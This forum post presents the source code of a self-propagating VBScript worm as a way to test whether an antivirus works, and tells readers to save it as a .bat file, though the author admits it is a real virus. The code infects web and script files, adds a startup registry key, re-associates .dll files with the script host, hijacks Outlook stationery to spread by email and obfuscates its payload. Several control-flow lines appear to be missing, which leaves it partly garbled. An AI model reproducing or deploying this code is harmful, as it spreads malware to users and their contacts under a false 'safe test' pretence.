Want to check your antivirus, is it work porperly or not???

Author Topic: Want to check your antivirus, is it work porperly or not???  (Read 2889 times)

Offline ashiqbest012

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It is a really virus but you can check it only for checking your anti virus.

Just open an notepad ( Opening process of notepad just go to start menu from Taskbar > All programs > Accessories > Notepad  and paste following message). If your anti virus work properly, antivirus will block this notepad, Otherwise, your antivirus does not work properly. and finally save the notepad named by Ashiq.Bat

Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
Exit Function
End If
If TypeStr = "htt" Then
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
End Function

Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Set AppleObject = document.applets("KJ_guest")
Set WsShell = AppleObject.GetObject()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Dim OtherArr(3)
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
End If
End Function

Name: Ashiq Hossain
ID: 121-14-696 & 083-11-558
Faculty of Business & Economics
Daffodil International University